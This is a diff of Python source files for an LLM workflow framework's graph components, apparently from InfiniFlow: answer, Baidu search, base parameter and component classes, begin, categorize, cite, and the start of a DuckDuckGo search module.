graph/component/__init__.py
Normal file
@ -0,0 +1,19 @@
|
||||
import importlib
|
||||
from .begin import Begin, BeginParam
|
||||
from .generate import Generate, GenerateParam
|
||||
from .retrieval import Retrieval, RetrievalParam
|
||||
from .answer import Answer, AnswerParam
|
||||
from .categorize import Categorize, CategorizeParam
|
||||
from .switch import Switch, SwitchParam
|
||||
from .relevant import Relevant, RelevantParam
|
||||
from .message import Message, MessageParam
|
||||
from .rewrite import RewriteQuestion, RewriteQuestionParam
|
||||
from .keyword import KeywordExtract, KeywordExtractParam
|
||||
from .baidu import Baidu, BaiduParam
|
||||
from .duckduckgosearch import DuckDuckGoSearch, DuckDuckGoSearchParam
|
||||
|
||||
|
||||
def component_class(class_name):
|
||||
m = importlib.import_module("graph.component")
|
||||
c = getattr(m, class_name)
|
||||
return c
|
||||
77
graph/component/answer.py
Normal file
77
graph/component/answer.py
Normal file
@ -0,0 +1,77 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import random
|
||||
from abc import ABC
|
||||
from functools import partial
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from graph.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class AnswerParam(ComponentParamBase):
|
||||
|
||||
"""
|
||||
Define the Answer component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.post_answers = []
|
||||
|
||||
def check(self):
|
||||
return True
|
||||
|
||||
|
||||
class Answer(ComponentBase, ABC):
|
||||
component_name = "Answer"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
if kwargs.get("stream"):
|
||||
return partial(self.stream_output)
|
||||
|
||||
ans = self.get_input()
|
||||
if self._param.post_answers:
|
||||
ans = pd.concat([ans, pd.DataFrame([{"content": random.choice(self._param.post_answers)}])], ignore_index=False)
|
||||
return ans
|
||||
|
||||
def stream_output(self):
|
||||
res = None
|
||||
if hasattr(self, "exception") and self.exception:
|
||||
res = {"content": str(self.exception)}
|
||||
self.exception = None
|
||||
yield res
|
||||
self.set_output(res)
|
||||
return
|
||||
|
||||
stream = self.get_stream_input()
|
||||
if isinstance(stream, pd.DataFrame):
|
||||
res = stream
|
||||
for ii, row in stream.iterrows():
|
||||
yield row.to_dict()
|
||||
else:
|
||||
for st in stream():
|
||||
res = st
|
||||
yield st
|
||||
if self._param.post_answers:
|
||||
res["content"] += random.choice(self._param.post_answers)
|
||||
yield res
|
||||
|
||||
self.set_output(res)
|
||||
|
||||
def set_exception(self, e):
|
||||
self.exception = e
|
||||
|
||||
|
||||
62
graph/component/baidu.py
Normal file
62
graph/component/baidu.py
Normal file
@ -0,0 +1,62 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import random
|
||||
from abc import ABC
|
||||
from functools import partial
|
||||
import pandas as pd
|
||||
import requests
|
||||
import re
|
||||
|
||||
from graph.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class BaiduParam(ComponentParamBase):
|
||||
"""
|
||||
Define the Baidu component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 10
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
|
||||
|
||||
class Baidu(ComponentBase, ABC):
|
||||
component_name = "Baidu"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return Baidu.be_output(self._param.no)
|
||||
|
||||
url = 'https://www.baidu.com/s?wd=' + ans + '&rn=' + str(self._param.top_n)
|
||||
headers = {
|
||||
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'}
|
||||
response = requests.get(url=url, headers=headers)
|
||||
|
||||
url_res = re.findall(r"'url': \\\"(.*?)\\\"}", response.text)
|
||||
title_res = re.findall(r"'title': \\\"(.*?)\\\",\\n", response.text)
|
||||
body_res = re.findall(r"\"contentText\":\"(.*?)\"", response.text)
|
||||
baidu_res = [re.sub('<em>|</em>', '', '<a href="' + url + '">' + title + '</a> ' + body) for url, title, body
|
||||
in zip(url_res, title_res, body_res)]
|
||||
del body_res, url_res, title_res
|
||||
|
||||
br = pd.DataFrame(baidu_res, columns=['content'])
|
||||
print(">>>>>>>>>>>>>>>>>>>>>>>>>>\n", br)
|
||||
return br
|
||||
480
graph/component/base.py
Normal file
480
graph/component/base.py
Normal file
@ -0,0 +1,480 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
import builtins
|
||||
import json
|
||||
import os
|
||||
from copy import deepcopy
|
||||
from functools import partial
|
||||
from typing import List, Dict, Tuple, Union
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from graph import settings
|
||||
from graph.settings import flow_logger, DEBUG
|
||||
|
||||
_FEEDED_DEPRECATED_PARAMS = "_feeded_deprecated_params"
|
||||
_DEPRECATED_PARAMS = "_deprecated_params"
|
||||
_USER_FEEDED_PARAMS = "_user_feeded_params"
|
||||
_IS_RAW_CONF = "_is_raw_conf"
|
||||
|
||||
|
||||
class ComponentParamBase(ABC):
|
||||
def __init__(self):
|
||||
self.output_var_name = "output"
|
||||
self.message_history_window_size = 4
|
||||
|
||||
def set_name(self, name: str):
|
||||
self._name = name
|
||||
return self
|
||||
|
||||
def check(self):
|
||||
raise NotImplementedError("Parameter Object should be checked.")
|
||||
|
||||
@classmethod
|
||||
def _get_or_init_deprecated_params_set(cls):
|
||||
if not hasattr(cls, _DEPRECATED_PARAMS):
|
||||
setattr(cls, _DEPRECATED_PARAMS, set())
|
||||
return getattr(cls, _DEPRECATED_PARAMS)
|
||||
|
||||
def _get_or_init_feeded_deprecated_params_set(self, conf=None):
|
||||
if not hasattr(self, _FEEDED_DEPRECATED_PARAMS):
|
||||
if conf is None:
|
||||
setattr(self, _FEEDED_DEPRECATED_PARAMS, set())
|
||||
else:
|
||||
setattr(
|
||||
self,
|
||||
_FEEDED_DEPRECATED_PARAMS,
|
||||
set(conf[_FEEDED_DEPRECATED_PARAMS]),
|
||||
)
|
||||
return getattr(self, _FEEDED_DEPRECATED_PARAMS)
|
||||
|
||||
def _get_or_init_user_feeded_params_set(self, conf=None):
|
||||
if not hasattr(self, _USER_FEEDED_PARAMS):
|
||||
if conf is None:
|
||||
setattr(self, _USER_FEEDED_PARAMS, set())
|
||||
else:
|
||||
setattr(self, _USER_FEEDED_PARAMS, set(conf[_USER_FEEDED_PARAMS]))
|
||||
return getattr(self, _USER_FEEDED_PARAMS)
|
||||
|
||||
def get_user_feeded(self):
|
||||
return self._get_or_init_user_feeded_params_set()
|
||||
|
||||
def get_feeded_deprecated_params(self):
|
||||
return self._get_or_init_feeded_deprecated_params_set()
|
||||
|
||||
@property
|
||||
def _deprecated_params_set(self):
|
||||
return {name: True for name in self.get_feeded_deprecated_params()}
|
||||
|
||||
def __str__(self):
|
||||
|
||||
return json.dumps(self.as_dict(), ensure_ascii=False)
|
||||
|
||||
def as_dict(self):
|
||||
def _recursive_convert_obj_to_dict(obj):
|
||||
ret_dict = {}
|
||||
for attr_name in list(obj.__dict__):
|
||||
if attr_name in [_FEEDED_DEPRECATED_PARAMS, _DEPRECATED_PARAMS, _USER_FEEDED_PARAMS, _IS_RAW_CONF]:
|
||||
continue
|
||||
# get attr
|
||||
attr = getattr(obj, attr_name)
|
||||
if isinstance(attr, pd.DataFrame):
|
||||
ret_dict[attr_name] = attr.to_dict()
|
||||
continue
|
||||
if attr and type(attr).__name__ not in dir(builtins):
|
||||
ret_dict[attr_name] = _recursive_convert_obj_to_dict(attr)
|
||||
else:
|
||||
ret_dict[attr_name] = attr
|
||||
|
||||
return ret_dict
|
||||
|
||||
return _recursive_convert_obj_to_dict(self)
|
||||
|
||||
def update(self, conf, allow_redundant=False):
|
||||
update_from_raw_conf = conf.get(_IS_RAW_CONF, True)
|
||||
if update_from_raw_conf:
|
||||
deprecated_params_set = self._get_or_init_deprecated_params_set()
|
||||
feeded_deprecated_params_set = (
|
||||
self._get_or_init_feeded_deprecated_params_set()
|
||||
)
|
||||
user_feeded_params_set = self._get_or_init_user_feeded_params_set()
|
||||
setattr(self, _IS_RAW_CONF, False)
|
||||
else:
|
||||
feeded_deprecated_params_set = (
|
||||
self._get_or_init_feeded_deprecated_params_set(conf)
|
||||
)
|
||||
user_feeded_params_set = self._get_or_init_user_feeded_params_set(conf)
|
||||
|
||||
def _recursive_update_param(param, config, depth, prefix):
|
||||
if depth > settings.PARAM_MAXDEPTH:
|
||||
raise ValueError("Param define nesting too deep!!!, can not parse it")
|
||||
|
||||
inst_variables = param.__dict__
|
||||
redundant_attrs = []
|
||||
for config_key, config_value in config.items():
|
||||
# redundant attr
|
||||
if config_key not in inst_variables:
|
||||
if not update_from_raw_conf and config_key.startswith("_"):
|
||||
setattr(param, config_key, config_value)
|
||||
else:
|
||||
setattr(param, config_key, config_value)
|
||||
# redundant_attrs.append(config_key)
|
||||
continue
|
||||
|
||||
full_config_key = f"{prefix}{config_key}"
|
||||
|
||||
if update_from_raw_conf:
|
||||
# add user feeded params
|
||||
user_feeded_params_set.add(full_config_key)
|
||||
|
||||
# update user feeded deprecated param set
|
||||
if full_config_key in deprecated_params_set:
|
||||
feeded_deprecated_params_set.add(full_config_key)
|
||||
|
||||
# supported attr
|
||||
attr = getattr(param, config_key)
|
||||
if type(attr).__name__ in dir(builtins) or attr is None:
|
||||
setattr(param, config_key, config_value)
|
||||
|
||||
else:
|
||||
# recursive set obj attr
|
||||
sub_params = _recursive_update_param(
|
||||
attr, config_value, depth + 1, prefix=f"{prefix}{config_key}."
|
||||
)
|
||||
setattr(param, config_key, sub_params)
|
||||
|
||||
if not allow_redundant and redundant_attrs:
|
||||
raise ValueError(
|
||||
f"cpn `{getattr(self, '_name', type(self))}` has redundant parameters: `{[redundant_attrs]}`"
|
||||
)
|
||||
|
||||
return param
|
||||
|
||||
return _recursive_update_param(param=self, config=conf, depth=0, prefix="")
|
||||
|
||||
def extract_not_builtin(self):
|
||||
def _get_not_builtin_types(obj):
|
||||
ret_dict = {}
|
||||
for variable in obj.__dict__:
|
||||
attr = getattr(obj, variable)
|
||||
if attr and type(attr).__name__ not in dir(builtins):
|
||||
ret_dict[variable] = _get_not_builtin_types(attr)
|
||||
|
||||
return ret_dict
|
||||
|
||||
return _get_not_builtin_types(self)
|
||||
|
||||
def validate(self):
|
||||
self.builtin_types = dir(builtins)
|
||||
self.func = {
|
||||
"ge": self._greater_equal_than,
|
||||
"le": self._less_equal_than,
|
||||
"in": self._in,
|
||||
"not_in": self._not_in,
|
||||
"range": self._range,
|
||||
}
|
||||
home_dir = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
|
||||
param_validation_path_prefix = home_dir + "/param_validation/"
|
||||
|
||||
param_name = type(self).__name__
|
||||
param_validation_path = "/".join(
|
||||
[param_validation_path_prefix, param_name + ".json"]
|
||||
)
|
||||
|
||||
validation_json = None
|
||||
|
||||
try:
|
||||
with open(param_validation_path, "r") as fin:
|
||||
validation_json = json.loads(fin.read())
|
||||
except BaseException:
|
||||
return
|
||||
|
||||
self._validate_param(self, validation_json)
|
||||
|
||||
def _validate_param(self, param_obj, validation_json):
|
||||
default_section = type(param_obj).__name__
|
||||
var_list = param_obj.__dict__
|
||||
|
||||
for variable in var_list:
|
||||
attr = getattr(param_obj, variable)
|
||||
|
||||
if type(attr).__name__ in self.builtin_types or attr is None:
|
||||
if variable not in validation_json:
|
||||
continue
|
||||
|
||||
validation_dict = validation_json[default_section][variable]
|
||||
value = getattr(param_obj, variable)
|
||||
value_legal = False
|
||||
|
||||
for op_type in validation_dict:
|
||||
if self.func[op_type](value, validation_dict[op_type]):
|
||||
value_legal = True
|
||||
break
|
||||
|
||||
if not value_legal:
|
||||
raise ValueError(
|
||||
"Plase check runtime conf, {} = {} does not match user-parameter restriction".format(
|
||||
variable, value
|
||||
)
|
||||
)
|
||||
|
||||
elif variable in validation_json:
|
||||
self._validate_param(attr, validation_json)
|
||||
|
||||
@staticmethod
|
||||
def check_string(param, descr):
|
||||
if type(param).__name__ not in ["str"]:
|
||||
raise ValueError(
|
||||
descr + " {} not supported, should be string type".format(param)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_empty(param, descr):
|
||||
if not param:
|
||||
raise ValueError(
|
||||
descr + " does not support empty value."
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_positive_integer(param, descr):
|
||||
if type(param).__name__ not in ["int", "long"] or param <= 0:
|
||||
raise ValueError(
|
||||
descr + " {} not supported, should be positive integer".format(param)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_positive_number(param, descr):
|
||||
if type(param).__name__ not in ["float", "int", "long"] or param <= 0:
|
||||
raise ValueError(
|
||||
descr + " {} not supported, should be positive numeric".format(param)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_nonnegative_number(param, descr):
|
||||
if type(param).__name__ not in ["float", "int", "long"] or param < 0:
|
||||
raise ValueError(
|
||||
descr
|
||||
+ " {} not supported, should be non-negative numeric".format(param)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_decimal_float(param, descr):
|
||||
if type(param).__name__ not in ["float", "int"] or param < 0 or param > 1:
|
||||
raise ValueError(
|
||||
descr
|
||||
+ " {} not supported, should be a float number in range [0, 1]".format(
|
||||
param
|
||||
)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_boolean(param, descr):
|
||||
if type(param).__name__ != "bool":
|
||||
raise ValueError(
|
||||
descr + " {} not supported, should be bool type".format(param)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_open_unit_interval(param, descr):
|
||||
if type(param).__name__ not in ["float"] or param <= 0 or param >= 1:
|
||||
raise ValueError(
|
||||
descr + " should be a numeric number between 0 and 1 exclusively"
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_valid_value(param, descr, valid_values):
|
||||
if param not in valid_values:
|
||||
raise ValueError(
|
||||
descr
|
||||
+ " {} is not supported, it should be in {}".format(param, valid_values)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_defined_type(param, descr, types):
|
||||
if type(param).__name__ not in types:
|
||||
raise ValueError(
|
||||
descr + " {} not supported, should be one of {}".format(param, types)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_and_change_lower(param, valid_list, descr=""):
|
||||
if type(param).__name__ != "str":
|
||||
raise ValueError(
|
||||
descr
|
||||
+ " {} not supported, should be one of {}".format(param, valid_list)
|
||||
)
|
||||
|
||||
lower_param = param.lower()
|
||||
if lower_param in valid_list:
|
||||
return lower_param
|
||||
else:
|
||||
raise ValueError(
|
||||
descr
|
||||
+ " {} not supported, should be one of {}".format(param, valid_list)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _greater_equal_than(value, limit):
|
||||
return value >= limit - settings.FLOAT_ZERO
|
||||
|
||||
@staticmethod
|
||||
def _less_equal_than(value, limit):
|
||||
return value <= limit + settings.FLOAT_ZERO
|
||||
|
||||
@staticmethod
|
||||
def _range(value, ranges):
|
||||
in_range = False
|
||||
for left_limit, right_limit in ranges:
|
||||
if (
|
||||
left_limit - settings.FLOAT_ZERO
|
||||
<= value
|
||||
<= right_limit + settings.FLOAT_ZERO
|
||||
):
|
||||
in_range = True
|
||||
break
|
||||
|
||||
return in_range
|
||||
|
||||
@staticmethod
|
||||
def _in(value, right_value_list):
|
||||
return value in right_value_list
|
||||
|
||||
@staticmethod
|
||||
def _not_in(value, wrong_value_list):
|
||||
return value not in wrong_value_list
|
||||
|
||||
def _warn_deprecated_param(self, param_name, descr):
|
||||
if self._deprecated_params_set.get(param_name):
|
||||
flow_logger.warning(
|
||||
f"{descr} {param_name} is deprecated and ignored in this version."
|
||||
)
|
||||
|
||||
def _warn_to_deprecate_param(self, param_name, descr, new_param):
|
||||
if self._deprecated_params_set.get(param_name):
|
||||
flow_logger.warning(
|
||||
f"{descr} {param_name} will be deprecated in future release; "
|
||||
f"please use {new_param} instead."
|
||||
)
|
||||
return True
|
||||
return False
|
||||
|
||||
|
||||
class ComponentBase(ABC):
|
||||
component_name: str
|
||||
|
||||
def __str__(self):
|
||||
"""
|
||||
{
|
||||
"component_name": "Begin",
|
||||
"params": {}
|
||||
}
|
||||
"""
|
||||
return """{{
|
||||
"component_name": "{}",
|
||||
"params": {}
|
||||
}}""".format(self.component_name,
|
||||
self._param
|
||||
)
|
||||
|
||||
def __init__(self, canvas, id, param: ComponentParamBase):
|
||||
self._canvas = canvas
|
||||
self._id = id
|
||||
self._param = param
|
||||
self._param.check()
|
||||
|
||||
def run(self, history, **kwargs):
|
||||
flow_logger.info("{}, history: {}, kwargs: {}".format(self, json.dumps(history, ensure_ascii=False),
|
||||
json.dumps(kwargs, ensure_ascii=False)))
|
||||
try:
|
||||
res = self._run(history, **kwargs)
|
||||
self.set_output(res)
|
||||
except Exception as e:
|
||||
self.set_output(pd.DataFrame([{"content": str(e)}]))
|
||||
raise e
|
||||
|
||||
return res
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
raise NotImplementedError()
|
||||
|
||||
def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame, partial]]:
|
||||
o = getattr(self._param, self._param.output_var_name)
|
||||
if not isinstance(o, partial) and not isinstance(o, pd.DataFrame):
|
||||
if not isinstance(o, list): o = [o]
|
||||
o = pd.DataFrame(o)
|
||||
|
||||
if allow_partial or not isinstance(o, partial):
|
||||
if not isinstance(o, partial) and not isinstance(o, pd.DataFrame):
|
||||
return pd.DataFrame(o if isinstance(o, list) else [o])
|
||||
return self._param.output_var_name, o
|
||||
|
||||
outs = None
|
||||
for oo in o():
|
||||
if not isinstance(oo, pd.DataFrame):
|
||||
outs = pd.DataFrame(oo if isinstance(oo, list) else [oo])
|
||||
else: outs = oo
|
||||
return self._param.output_var_name, outs
|
||||
|
||||
def reset(self):
|
||||
setattr(self._param, self._param.output_var_name, None)
|
||||
|
||||
def set_output(self, v: pd.DataFrame):
|
||||
setattr(self._param, self._param.output_var_name, v)
|
||||
|
||||
def get_input(self):
|
||||
upstream_outs = []
|
||||
reversed_cpnts = []
|
||||
if len(self._canvas.path) > 1:
|
||||
reversed_cpnts.extend(self._canvas.path[-2])
|
||||
reversed_cpnts.extend(self._canvas.path[-1])
|
||||
|
||||
if DEBUG: print(self.component_name, reversed_cpnts[::-1])
|
||||
for u in reversed_cpnts[::-1]:
|
||||
if self.get_component_name(u) in ["switch"]: continue
|
||||
if self.component_name.lower().find("switch") < 0 \
|
||||
and self.get_component_name(u) in ["relevant", "categorize"]:
|
||||
continue
|
||||
if u.lower().find("answer") >= 0:
|
||||
for r, c in self._canvas.history[::-1]:
|
||||
if r == "user":
|
||||
upstream_outs.append(pd.DataFrame([{"content": c}]))
|
||||
break
|
||||
break
|
||||
if self.component_name.lower().find("answer") >= 0:
|
||||
if self.get_component_name(u) in ["relevant"]: continue
|
||||
|
||||
else: upstream_outs.append(self._canvas.get_component(u)["obj"].output(allow_partial=False)[1])
|
||||
break
|
||||
|
||||
return pd.concat(upstream_outs, ignore_index=False)
|
||||
|
||||
def get_stream_input(self):
|
||||
reversed_cpnts = []
|
||||
if len(self._canvas.path) > 1:
|
||||
reversed_cpnts.extend(self._canvas.path[-2])
|
||||
reversed_cpnts.extend(self._canvas.path[-1])
|
||||
|
||||
for u in reversed_cpnts[::-1]:
|
||||
if self.get_component_name(u) in ["switch", "answer"]: continue
|
||||
return self._canvas.get_component(u)["obj"].output()[1]
|
||||
|
||||
@staticmethod
|
||||
def be_output(v):
|
||||
return pd.DataFrame([{"content": v}])
|
||||
|
||||
def get_component_name(self, cpn_id):
|
||||
return self._canvas.get_component(cpn_id)["obj"].component_name.lower()
|
||||
49
graph/component/begin.py
Normal file
49
graph/component/begin.py
Normal file
@ -0,0 +1,49 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
from functools import partial
|
||||
|
||||
import pandas as pd
|
||||
from graph.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
class BeginParam(ComponentParamBase):
|
||||
|
||||
"""
|
||||
Define the Begin component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.prologue = "Hi! I'm your smart assistant. What can I do for you?"
|
||||
|
||||
def check(self):
|
||||
return True
|
||||
|
||||
|
||||
class Begin(ComponentBase):
|
||||
component_name = "Begin"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
if kwargs.get("stream"):
|
||||
return partial(self.stream_output)
|
||||
return pd.DataFrame([{"content": self._param.prologue}])
|
||||
|
||||
def stream_output(self):
|
||||
res = {"content": self._param.prologue}
|
||||
yield res
|
||||
self.set_output(res)
|
||||
|
||||
|
||||
|
||||
90
graph/component/categorize.py
Normal file
90
graph/component/categorize.py
Normal file
@ -0,0 +1,90 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from api.db import LLMType
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from graph.component import GenerateParam, Generate
|
||||
from graph.settings import DEBUG
|
||||
|
||||
|
||||
class CategorizeParam(GenerateParam):
|
||||
|
||||
"""
|
||||
Define the Categorize component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.category_description = {}
|
||||
self.prompt = ""
|
||||
|
||||
def check(self):
|
||||
super().check()
|
||||
self.check_empty(self.category_description, "[Categorize] Category examples")
|
||||
for k, v in self.category_description.items():
|
||||
if not k: raise ValueError(f"[Categorize] Category name can not be empty!")
|
||||
if not v.get("to"): raise ValueError(f"[Categorize] 'To' of category {k} can not be empty!")
|
||||
|
||||
def get_prompt(self):
|
||||
cate_lines = []
|
||||
for c, desc in self.category_description.items():
|
||||
for l in desc.get("examples", "").split("\n"):
|
||||
if not l: continue
|
||||
cate_lines.append("Question: {}\tCategory: {}".format(l, c))
|
||||
descriptions = []
|
||||
for c, desc in self.category_description.items():
|
||||
if desc.get("description"):
|
||||
descriptions.append(
|
||||
"--------------------\nCategory: {}\nDescription: {}\n".format(c, desc["description"]))
|
||||
|
||||
self.prompt = """
|
||||
You're a text classifier. You need to categorize the user’s questions into {} categories,
|
||||
namely: {}
|
||||
Here's description of each category:
|
||||
{}
|
||||
|
||||
You could learn from the following examples:
|
||||
{}
|
||||
You could learn from the above examples.
|
||||
Just mention the category names, no need for any additional words.
|
||||
""".format(
|
||||
len(self.category_description.keys()),
|
||||
"/".join(list(self.category_description.keys())),
|
||||
"\n".join(descriptions),
|
||||
"- ".join(cate_lines)
|
||||
)
|
||||
return self.prompt
|
||||
|
||||
|
||||
class Categorize(Generate, ABC):
|
||||
component_name = "Categorize"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
input = self.get_input()
|
||||
input = "Question: " + ("; ".join(input["content"]) if "content" in input else "") + "Category: "
|
||||
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
|
||||
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": input}],
|
||||
self._param.gen_conf())
|
||||
if DEBUG: print(ans, ":::::::::::::::::::::::::::::::::", input)
|
||||
for c in self._param.category_description.keys():
|
||||
if ans.lower().find(c.lower()) >= 0:
|
||||
return Categorize.be_output(self._param.category_description[c]["to"])
|
||||
|
||||
return Categorize.be_output(self._param.category_description.items()[-1][1]["to"])
|
||||
|
||||
|
||||
75
graph/component/cite.py
Normal file
75
graph/component/cite.py
Normal file
@ -0,0 +1,75 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from api.db import LLMType
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from api.settings import retrievaler
|
||||
from graph.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class CiteParam(ComponentParamBase):
|
||||
|
||||
"""
|
||||
Define the Retrieval component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.cite_sources = []
|
||||
|
||||
def check(self):
|
||||
self.check_empty(self.cite_source, "Please specify where you want to cite from.")
|
||||
|
||||
|
||||
class Cite(ComponentBase, ABC):
|
||||
component_name = "Cite"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
input = "\n- ".join(self.get_input()["content"])
|
||||
sources = [self._canvas.get_component(cpn_id).output()[1] for cpn_id in self._param.cite_source]
|
||||
query = []
|
||||
for role, cnt in history[::-1][:self._param.message_history_window_size]:
|
||||
if role != "user":continue
|
||||
query.append(cnt)
|
||||
query = "\n".join(query)
|
||||
|
||||
kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
|
||||
if not kbs:
|
||||
raise ValueError("Can't find knowledgebases by {}".format(self._param.kb_ids))
|
||||
embd_nms = list(set([kb.embd_id for kb in kbs]))
|
||||
assert len(embd_nms) == 1, "Knowledge bases use different embedding models."
|
||||
|
||||
embd_mdl = LLMBundle(kbs[0].tenant_id, LLMType.EMBEDDING, embd_nms[0])
|
||||
|
||||
rerank_mdl = None
|
||||
if self._param.rerank_id:
|
||||
rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)
|
||||
|
||||
kbinfos = retrievaler.retrieval(query, embd_mdl, kbs[0].tenant_id, self._param.kb_ids,
|
||||
1, self._param.top_n,
|
||||
self._param.similarity_threshold, 1 - self._param.keywords_similarity_weight,
|
||||
aggs=False, rerank_mdl=rerank_mdl)
|
||||
|
||||
if not kbinfos["chunks"]: return pd.DataFrame()
|
||||
df = pd.DataFrame(kbinfos["chunks"])
|
||||
df["content"] = df["content_with_weight"]
|
||||
del df["content_with_weight"]
|
||||
return df
|
||||
|
||||
|
||||
62
graph/component/duckduckgosearch.py
Normal file
62
graph/component/duckduckgosearch.py
Normal file
@ -0,0 +1,62 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
